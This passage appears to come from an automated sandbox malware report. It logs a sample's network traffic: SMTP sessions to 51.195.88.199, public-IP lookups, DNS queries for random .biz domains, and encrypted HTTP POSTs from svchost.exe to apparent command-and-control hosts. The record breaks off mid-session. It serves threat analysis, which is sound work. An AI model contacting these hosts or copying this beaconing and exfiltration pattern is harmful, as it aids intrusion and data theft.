                                                                                                                                                      Nov 28, 2024 18:30:22.210232973 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.210273027 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.210324049 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.210374117 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.210383892 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.211047888 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.211059093 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.211076975 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.211159945 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.256736040 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.256805897 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.302654982 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.302678108 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.302767992 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.302777052 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.302864075 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.302871943 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.302891016 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.722023010 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:22.900934935 CET49989587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:33.917011023 CET49989587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:34.037519932 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:34.326739073 CET5874998951.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:34.327343941 CET49989587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:34.328260899 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:34.449493885 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:34.449806929 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:35.806843042 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:35.816112995 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:35.943006039 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:36.242697001 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:36.243056059 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:36.612401962 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:36.612539053 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:36.667963982 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:36.996812105 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:36.996876955 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:37.089616060 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:37.120249033 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:37.385895967 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:37.386315107 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:37.506676912 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:37.815130949 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:37.815154076 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:37.815160990 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:37.815346956 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:37.816809893 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:37.942666054 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:38.242115974 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:38.243954897 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:38.364905119 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:38.662714005 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:38.663254023 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:38.783780098 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:39.092657089 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:39.093538046 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:39.214267015 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:39.514997005 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:39.516205072 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:39.641927004 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:39.939840078 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:39.940675974 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:40.060842991 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:40.362754107 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:40.362967014 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:40.483431101 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:40.786154032 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:40.786468029 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:40.786581993 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:40.786628962 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:40.786714077 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:40.790517092 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:40.907545090 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:40.907588959 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:40.907598972 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:40.907622099 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:40.907744884 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:40.907784939 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:40.911741972 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:40.911751986 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:40.911839008 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:40.911866903 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:40.911923885 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.029863119 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.029880047 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.029889107 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.029969931 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.034754992 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.034765959 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.034838915 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.034878016 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.034890890 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.034943104 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.150346994 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.150373936 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.150471926 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.154476881 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.154548883 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.154635906 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.154690027 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.196341038 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.196450949 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.275360107 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.275439024 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.279719114 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.279773951 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.279784918 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.279833078 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.279998064 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.280051947 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.320337057 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.320449114 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.402108908 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.402200937 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.406438112 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.406532049 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.406537056 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.406605005 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.406733036 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.406824112 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.528904915 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.528970957 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.533046007 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.533210993 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:41.533276081 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.650015116 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.653533936 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.653630972 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.653724909 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.653764009 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.653855085 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.769998074 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.770014048 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.773529053 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.773554087 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.773613930 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.773653030 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.773713112 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.773722887 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.773844957 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.773868084 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.773962975 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.890041113 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.890064001 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.893578053 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.893589020 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.893605947 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.893614054 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.893660069 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.893781900 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.893857002 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.893965960 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:41.893975973 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:42.009855986 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:42.009879112 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:42.013365984 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:42.013376951 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:42.013705969 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:42.013716936 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:42.013725996 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:42.326184034 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:42.432276964 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:54.843980074 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:54.969850063 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:55.268047094 CET5874999051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:55.268438101 CET49990587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:55.268726110 CET49991587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:55.390222073 CET5874999151.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:55.390384912 CET49991587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:30:56.699347019 CET5874999151.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:30:56.760524988 CET49991587192.168.2.751.195.88.199
                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Nov 28, 2024 18:26:50.330897093 CET5157453192.168.2.71.1.1.1
                                                                                                                                                      Nov 28, 2024 18:26:50.729108095 CET5102853192.168.2.71.1.1.1
                                                                                                                                                      Nov 28, 2024 18:26:50.870781898 CET53510281.1.1.1192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:50.888780117 CET53515741.1.1.1192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:51.095654964 CET5150453192.168.2.71.1.1.1
                                                                                                                                                      Nov 28, 2024 18:26:51.234446049 CET53515041.1.1.1192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:53.660646915 CET5634753192.168.2.71.1.1.1
                                                                                                                                                      Nov 28, 2024 18:26:53.803590059 CET53563471.1.1.1192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:54.081670046 CET5824853192.168.2.71.1.1.1
                                                                                                                                                      Nov 28, 2024 18:26:54.331039906 CET53582481.1.1.1192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:08.880409956 CET6152553192.168.2.71.1.1.1
                                                                                                                                                      Nov 28, 2024 18:27:09.018801928 CET53615251.1.1.1192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:11.089394093 CET4954753192.168.2.71.1.1.1
                                                                                                                                                      Nov 28, 2024 18:27:11.711520910 CET53495471.1.1.1192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:15.500617981 CET5180553192.168.2.71.1.1.1
                                                                                                                                                      Nov 28, 2024 18:27:16.111666918 CET53518051.1.1.1192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:18.229836941 CET5859453192.168.2.71.1.1.1
                                                                                                                                                      Nov 28, 2024 18:27:18.942018032 CET53585941.1.1.1192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:36.667602062 CET5449653192.168.2.71.1.1.1
                                                                                                                                                      Nov 28, 2024 18:27:36.809187889 CET53544961.1.1.1192.168.2.7
                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                      Nov 28, 2024 18:26:50.330897093 CET192.168.2.71.1.1.10x2839Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:26:50.729108095 CET192.168.2.71.1.1.10x646aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:26:51.095654964 CET192.168.2.71.1.1.10xc0a4Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:26:53.660646915 CET192.168.2.71.1.1.10x2e4bStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:26:54.081670046 CET192.168.2.71.1.1.10x6addStandard query (0)s82.gocheapweb.comA (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:27:08.880409956 CET192.168.2.71.1.1.10x6708Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:27:11.089394093 CET192.168.2.71.1.1.10x9275Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:27:15.500617981 CET192.168.2.71.1.1.10x7586Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:27:18.229836941 CET192.168.2.71.1.1.10x6df1Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:27:36.667602062 CET192.168.2.71.1.1.10x1d4Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                      Nov 28, 2024 18:26:50.870781898 CET1.1.1.1192.168.2.70x646aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:26:50.870781898 CET1.1.1.1192.168.2.70x646aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:26:50.870781898 CET1.1.1.1192.168.2.70x646aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:26:50.870781898 CET1.1.1.1192.168.2.70x646aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:26:50.870781898 CET1.1.1.1192.168.2.70x646aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:26:50.870781898 CET1.1.1.1192.168.2.70x646aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:26:50.888780117 CET1.1.1.1192.168.2.70x2839No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:26:51.234446049 CET1.1.1.1192.168.2.70xc0a4No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:26:51.234446049 CET1.1.1.1192.168.2.70xc0a4No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:26:51.234446049 CET1.1.1.1192.168.2.70xc0a4No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:26:53.803590059 CET1.1.1.1192.168.2.70x2e4bNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:26:53.803590059 CET1.1.1.1192.168.2.70x2e4bNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:26:54.331039906 CET1.1.1.1192.168.2.70x6addNo error (0)s82.gocheapweb.com51.195.88.199A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:27:09.018801928 CET1.1.1.1192.168.2.70x6708No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:27:11.711520910 CET1.1.1.1192.168.2.70x9275No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:27:16.111666918 CET1.1.1.1192.168.2.70x7586No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:27:18.942018032 CET1.1.1.1192.168.2.70x6df1No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                      Nov 28, 2024 18:27:36.809187889 CET1.1.1.1192.168.2.70x1d4No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                      • api.ipify.org
                                                                                                                                                      • reallyfreegeoip.org
                                                                                                                                                      • checkip.dyndns.org
                                                                                                                                                      • pywolwnvd.biz
                                                                                                                                                      • ssbzmoy.biz
                                                                                                                                                      • cvgrf.biz
                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.749701132.226.8.169806012C:\Users\user\AppData\Local\Temp\server02.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Nov 28, 2024 18:26:51.005358934 CET151OUTGET / HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Nov 28, 2024 18:26:52.891927958 CET273INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 28 Nov 2024 17:26:52 GMT
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Content-Length: 104
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                                                      Nov 28, 2024 18:26:52.964982986 CET127OUTGET / HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                                      Nov 28, 2024 18:26:53.482584953 CET273INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 28 Nov 2024 17:26:53 GMT
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Content-Length: 104
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      1192.168.2.74973854.244.188.177807848C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Nov 28, 2024 18:27:09.634145021 CET356OUTPOST /vnpplpufavm HTTP/1.1
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Host: pywolwnvd.biz
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                      Content-Length: 784
                                                                                                                                                      Nov 28, 2024 18:27:09.634183884 CET784OUTData Raw: 79 48 0a a4 e6 e4 ce d1 04 03 00 00 6a 2a f9 4e e9 fc 38 f4 c9 bc 04 9d 69 a5 94 d5 f5 62 23 35 06 17 a8 7d 3c 3d a7 c0 95 19 1a 5d d3 73 be 44 84 bc 22 f9 4f 2d b1 17 5e 8d d8 29 57 ef b5 ef 84 e2 df e1 ef 96 08 22 b8 12 08 de f9 34 86 af 55 35
                                                                                                                                                      Data Ascii: yHj*N8ib#5}<=]sD"O-^)W"4U5ez#//J$Azb\Vm})WB&$LRV;hMW0K(Br2" ~zOZyrX-#gk%PNSQ?g&Z|JT1^!6.
                                                                                                                                                      Nov 28, 2024 18:27:11.072211981 CET413INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 28 Nov 2024 17:27:10 GMT
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: btst=470ca829fb397d044e3de3a5717431fc|8.46.123.228|1732814830|1732814830|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                      Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      2192.168.2.74974518.141.10.107807848C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Nov 28, 2024 18:27:13.360536098 CET350OUTPOST /kokmvod HTTP/1.1
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Host: ssbzmoy.biz
